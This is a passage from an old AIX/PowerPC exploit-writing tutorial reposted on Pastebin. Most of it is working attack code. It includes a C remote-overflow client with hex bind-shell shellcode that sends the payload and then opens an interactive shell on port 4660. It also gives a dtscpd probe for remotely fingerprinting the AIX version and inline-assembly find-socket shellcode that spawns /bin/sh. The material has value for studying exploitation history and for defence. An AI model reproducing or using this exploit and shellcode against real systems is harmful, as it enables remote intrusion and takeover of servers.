Pastebin.com - Printed Paste ID: https://pastebin.com/

1. It is easy to write the attack programme after gaining the overflow buffer size and the return address.
2.  
3. /* client.c - remote overflow demo
4. *
5. * 2004.06.16
6. * san@nsfocus.com
7. */
8.  
9. #include <stdio.h>
10. #include <string.h>
11. #include <stdlib.h>
12. #include <unistd.h>
13. #include <ctype.h>
14. #include <sys/types.h>
15. #include <sys/socket.h>
16. #include <sys/ioctl.h>
17. #include <sys/time.h>
18. #include <netdb.h>
19. #include <netinet/in.h>
20. #include <arpa/inet.h>
21. #include <errno.h>
22.  
23. // It needs adjust.
24. #define RET 0x2ff22d88;
25.  
26. unsigned char sh_Buff[] =
27. "\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */
28. "\x40\x82\xff\xfd" /* bnel <syscallcode> */
29. "\x7e\xa8\x02\xa6" /* mflr r21 */
30. "\x3a\xc0\x01\xff" /* lil r22,0x1ff */
31. "\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */
32. "\x7e\xb5\xba\x14" /* cax r21,r21,r23 */
33. "\x7e\xa9\x03\xa6" /* mtctr r21 */
34. "\x4e\x80\x04\x20" /* bctr */
35.  
36. "\x05\x82\x53\xa0" /* syscall numbers */
37. "\x87\xa0\x01\x42" /* execve=0x05 close=0xa0 */
38. "\x8d\x8c\x8b\x8a" /* socket=0x8d bind=0x8c */
39. /* listen=0x8b naccept=0x8a */
40. /* kfcntl=0x142 */
41.  
42. "\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
43. "\x44\xff\xff\x02" /* svca 0x0 */
44. "\x3a\xb5\xff\xf8" /* cal r21,-8(r21) */
45.  
46. "\x2c\x74\x12\x34" /* cmpi cr0,r20,0x1234 */
47. "\x41\x82\xff\xfd" /* beql <bindsckcode> */
48. "\x7f\x08\x02\xa6" /* mflr r24 */
49. "\x92\x98\xff\xfc" /* st r20,-4(r24) */
50. "\x38\x76\xfe\x03" /* cal r3,-509(r22) */
51. "\x38\x96\xfe\x02" /* cal r4,-510(r22) */
52. "\x98\x78\xff\xf9" /* stb r3,-7(r24) */
53. "\x7e\x85\xa3\x78" /* mr r5,r20 */
54. "\x88\x55\xff\xfc" /* lbz r2,-4(r21) */
55. "\x7e\xa9\x03\xa6" /* mtctr r21 */
56. "\x4e\x80\x04\x21" /* bctrl */
57. "\x7c\x79\x1b\x78" /* mr r25,r3 */
58. "\x38\x98\xff\xf8" /* cal r4,-8(r24) */
59. "\x38\xb6\xfe\x11" /* cal r5,-495(r22) */
60. "\x88\x55\xff\xfd" /* lbz r2,-3(r21) */
61. "\x7e\xa9\x03\xa6" /* mtctr r21 */
62. "\x4e\x80\x04\x21" /* bctrl */
63. "\x7f\x23\xcb\x78" /* mr r3,r25 */
64. "\x38\x96\xfe\x06" /* cal r4,-506(r22) */
65. "\x88\x55\xff\xfe" /* lbz r2,-2(r21) */
66. "\x7e\xa9\x03\xa6" /* mtctr r21 */
67. "\x4e\x80\x04\x21" /* bctrl */
68. "\x7f\x23\xcb\x78" /* mr r3,r25 */
69. "\x7e\x84\xa3\x78" /* mr r4,r20 */
70. "\x7e\x85\xa3\x78" /* mr r5,r20 */
71. "\x88\x55\xff\xff" /* lbz r2,-1(r21) */
72. "\x7e\xa9\x03\xa6" /* mtctr r21 */
73. "\x4e\x80\x04\x21" /* bctrl */
74. "\x7c\x79\x1b\x78" /* mr r25,r3 */
75. "\x3b\x56\xfe\x03" /* cal r26,-509(r22) */
76. "\x7f\x43\xd3\x78" /* mr r3,r26 */
77. "\x88\x55\xff\xf7" /* lbz r2,-9(r21) */
78. "\x7e\xa9\x03\xa6" /* mtctr r21 */
79. "\x4e\x80\x04\x21" /* bctrl */
80. "\x7f\x23\xcb\x78" /* mr r3,r25 */
81. "\x7e\x84\xa3\x78" /* mr r4,r20 */
82. "\x7f\x45\xd3\x78" /* mr r5,r26 */
83. "\xa0\x55\xff\xfa" /* lhz r2,-6(r21) */
84. "\x7e\xa9\x03\xa6" /* mtctr r21 */
85. "\x4e\x80\x04\x21" /* bctrl */
86. "\x37\x5a\xff\xff" /* ai. r26,r26,-1 */
87. "\x40\x80\xff\xd4" /* bge <bindsckcode+120> */
88.  
89. "\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
90. "\x40\x82\xff\xfd" /* bnel <shellcode> */
91. "\x7f\xe8\x02\xa6" /* mflr r31 */
92. "\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
93. "\x38\x7f\xff\x08" /* cal r3,-248(r31) */
94. "\x38\x9f\xff\x10" /* cal r4,-240(r31) */
95. "\x90\x7f\xff\x10" /* st r3,-240(r31) */
96. "\x90\xbf\xff\x14" /* st r5,-236(r31) */
97. "\x88\x55\xff\xf4" /* lbz r2,-12(r21) */
98. "\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
99. "\x7e\xa9\x03\xa6" /* mtctr r21 */
100. "\x4e\x80\x04\x20" /* bctr */
101. "/bin/sh"
102. ;
103.  
104. // ripped from isno
105. int Make_Connection(char *address,int port,int timeout)
106. {
107. struct sockaddr_in target;
108. int s,i,bf;
109. fd_set wd;
110. struct timeval tv;
111.  
112. s = socket(AF_INET,SOCK_STREAM,0);
113. if(s<0)
114. return -1;
115.  
116. target.sin_family = AF_INET;
117. target.sin_addr.s_addr = inet_addr(address);
118. if(target.sin_addr.s_addr==0)
119. {
120. close(s);
121. return -2;
122. }
123. target.sin_port = htons(port);
124. bf = 1;
125. ioctl(s,FIONBIO,&bf);
126. tv.tv_sec = timeout;
127. tv.tv_usec = 0;
128. FD_ZERO(&wd);
129. FD_SET(s,&wd);
130. connect(s,(struct sockaddr *)&target,sizeof(target));
131. if((i=select(s+1,0,&wd,0,&tv))==(-1))
132. {
133. close(s);
134. return -3;
135. }
136. if(i==0)
137. {
138. close(s);
139. return -4;
140. }
141. i = sizeof(int);
142. getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
143. if((bf!=0)||(i!=sizeof(int)))
144. {
145. close(s);
146. return -5;
147. }
148. ioctl(s,FIONBIO,&bf);
149. return s;
150. }
151.  
152. /* ripped from TESO code */
153. void shell (int sock)
154. {
155. int l;
156. char buf[512];
157. fd_set rfds;
158.  
159. while (1) {
160. FD_SET (0, &rfds);
161. FD_SET (sock, &rfds);
162.  
163. select (sock + 1, &rfds, NULL, NULL, NULL);
164.  
165. if (FD_ISSET (0, &rfds)) {
166. l = read (0, buf, sizeof (buf));
167. if (l <= 0) {
168. perror ("read user");
169. exit (EXIT_FAILURE);
170. }
171. write (sock, buf, l);
172. }
173.  
174. if (FD_ISSET (sock, &rfds)) {
175. l = read (sock, buf, sizeof (buf));
176. if (l <= 0) {
177. perror ("read remote");
178. exit (EXIT_FAILURE);
179. }
180. write (1, buf, l);
181. }
182. }
183. }
184.  
185. void PrintSc(unsigned char *lpBuff, int buffsize)
186. {
187. int i,j;
188. char *p;
189. char msg[4];
190. fprintf(stderr, "/* %d bytes */\n",buffsize);
191. for(i=0;i<buffsize;i++)
192. {
193. if((i%4)==0)
194. if(i!=0)
195. fprintf(stderr, "\"\n\"");
196. else
197. fprintf(stderr, "\"");
198. sprintf(msg,"\\x%.2X",lpBuff[i]&0xff);
199. for( p = msg, j=0; j < 4; p++, j++ )
200. {
201. if(isupper(*p))
202. fprintf(stderr, "%c", _tolower(*p));
203. else
204. fprintf(stderr, "%c", p[0]);
205. }
206. }
207. fprintf(stderr, "\";\n");
208. }
209.  
210. int main(int argc, char *argv[]) {
211. unsigned char Buff[1024];
212.  
213. unsigned long *ps;
214. int s, i, k;
215.  
216. if (argc < 3) {
217. fprintf(stderr, "Usage: %s remote_ip remote_port\n", argv[0]);
218. return -1;
219. }
220.  
221. s = Make_Connection(argv[1], atoi(argv[2]), 10);
222. if (!s) {
223. fprintf(stderr, "[-] Connect failed. \n");
224. return -1;
225. }
226.  
227. ps = (unsigned long *)Buff;
228. for(i=0; i<sizeof(Buff)/4; i++)
229. {
230. *(ps++) = 0x60000000;
231. }
232.  
233. i = sizeof(sh_Buff) % 4;
234.  
235. memcpy(&Buff[sizeof(Buff) - sizeof(sh_Buff) - i], sh_Buff, sizeof(sh_Buff));
236.  
237. ps = (unsigned long *)Buff;
238. for(i=0; i<92/4; i++)
239. {
240. *(ps++) = RET;
241. }
242. Buff[sizeof(Buff) - 1] = 0;
243.  
244. //PrintSc(Buff, sizeof(Buff));
245.  
246. i = send(s, Buff, sizeof(Buff), 0);
247. if (i <= 0) {
248. fprintf(stderr, "[-] Send failed. \n");
249. return -1;
250. }
251.  
252. sleep (1);
253.  
254. k = Make_Connection(argv[1], 4660, 10);
255. if (!k) {
256. fprintf(stderr, "[-] Connect failed. \n");
257. return -1;
258. }
259.  
260. shell(k);
261.  
262. }
263.  
264. Attack program is easy, but there are different syscall numbers in various AIX editions. In local exploit, you can use oslevel -r to determin AIX version, and then write in the corresponding syscall number. It is invalid in remote exploit. If the remote server provides dtscpd service(6112), we can send the following data to dtscpd service:
265.  
266. char peer0_0[] = {
267. 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x32,
268. 0x30, 0x34, 0x30, 0x30, 0x30, 0x64, 0x30, 0x30,
269. 0x30, 0x31, 0x20, 0x20, 0x34, 0x20, 0x00, 0x72,
270. 0x6f, 0x6f, 0x74, 0x00, 0x00, 0x31, 0x30, 0x00,
271. 0x00 };
272.  
273. The dtscpd service will return the following information about system in my box:
274.  
275. aix5:AIX:1:001381144C00
276.  
277. So we can obtain AIX version remotely, and then we write corresponding syscall number in shellcode by remote exploit.
278.  
279. --[ 8 - Find socket shellcode
280.  
281. Binding port shellcode can't be possibly connected and neither can connect back in the secure network environment protected by firewall. However, you can use the socket for attacking connect.
282.  
283. The LSD provides a way that uses getpeername to find socket, but there exists a problem that the port sent by attacker in the NAT network environment won't matches with the one searched by server. In addition, bkbll ever refered to another easy way that is OOB. Out of band data won't be blocked in Berkeley socket implement.
284.  
285. The following codes show how this shellcode to implement on AIX5.1:
286.  
287.  
288. void ShellCode()
289. {
290. asm \
291. (" \
292. Start: ;\
293. xor. %r20, %r20, %r20 ;\
294. bnel Start ;\
295. mflr %r21 ;\
296. addi %r21, %r21, 12 ;\
297. b Loop ;\
298. crorc %cr6, %cr6, %cr6 ;\
299. svca 0 ;\
300. \
301. Loop: ;\
302. li %r2, 0x81 ;\
303. mr %r3, %r20 ;\
304. addi %r4, %r21, -40 ;\
305. li %r5, 1 ;\
306. li %r6, 1 ;\
307. mtctr %r21 ;\
308. bctrl ;\
309. \
310. lbz %r4, -40(%r21) ;\
311. cmpi %cr0, %r4, 0x49 ;\
312. beq Found ;\
313. addi %r20, %r20, 1 ;\
314. b Loop ;\
315. \
316. Found: ;\
317. li %r22, 2 ;\
318. \
319. DupHandle: ;\
320. li %r2, 0xa0 ;\
321. mr %r3, %r22 ;\
322. mtctr %r21 ;\
323. bctrl ;\
324. \
325. li %r2, 0x142 ;\
326. mr %r3, %r20 ;\
327. li %r4, 0 ;\
328. mr %r5, %r22 ;\
329. mtctr %r21 ;\
330. bctrl ;\
331. \
332. addic. %r22, %r22, -1 ;\
333. bge DupHandle ;\
334. \
335. addi %r3, %r21, 140 ;\
336. stw %r3, -8(%r1) ;\
337. li %r5, 0 ;\
338. stw %r5, -4(%r1) ;\
339. subi %r4, %r1, 8 ;\
340. li %r2, 5 ;\
341. crorc %cr6, %cr6, %cr6 ;\
342. svca 0 ;\
343. .byte '/', 'b', 'i', 'n', \
344. '/', 's', 'h', 0x0 ;\
345. ");
346. }
347.  
348. The AIXes of other editions need changed the corresponding syscall number.
349.  
350. I have a presentation about find socket shellcode in Xcon 2004, and it is in various ways on various OS.
351.  
352. --[ 9 - Reference
353.  
354. [1] UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes
355. http://lsd-pl.net/unix_assembly.html
356. [2] PowerPC / OS X (Darwin) Shellcode Assembly - B-r00t
357. [3] Assembler Language Reference
358. http://publib16.boulder.ibm.com/pseries/en_US/aixassem/alangref/alangreftfrm.htm
359. [4] PowerPC Microprocessor Family: The Programming Environments for 32-Bit Microprocessors
360. http://www-3.ibm.com/chips/techlib/techlib.nsf/techdocs/852569B20050FF778525699600719DF2/$file/6xx_pem.pdf
361. [5] OPTIMIZING PowerPC CODE - Gary Kacmarcik
362. [6] PowerPC assembly
363. http://www-900.ibm.com/developerWorks/cn/linux/hardware/ppc/assembly/index_eng.shtml
364. [7] A developer's guide to the PowerPC architecture
365. http://www-900.ibm.com/developerWorks/cn/linux/l-powarch/index_eng.shtml
366. [8] [Tips]AIX (PPC)??exploite 1?
367. https://www.xfocus.net/bbs/index.php?act=ST&f=19&t=28177
368. [9] http://aixpdslib.seas.ucla.edu/
369. [10] 64-bit PowerPC ELF Application Binary Interface Supplement 1.7
370. http://www.linuxbase.org/spec/ELF/ppc64/spec/book1.html
371. [11] Mach-O Runtime Conventions for PowerPC
372. http://developer.apple.com/documentation/DeveloperTools/Conceptual/MachORuntime/2rt_powerpc_abi/chapter_9_section_1.html
373. [12] Programmer's Introduction to PowerPC
374. http://physinfo-mac0.ulb.ac.be/divers_html/PowerPC_Programming_Info/intro_to_ppc/ppc0_index.html
375. [13] http://www.honeynet.org/scans/scan28/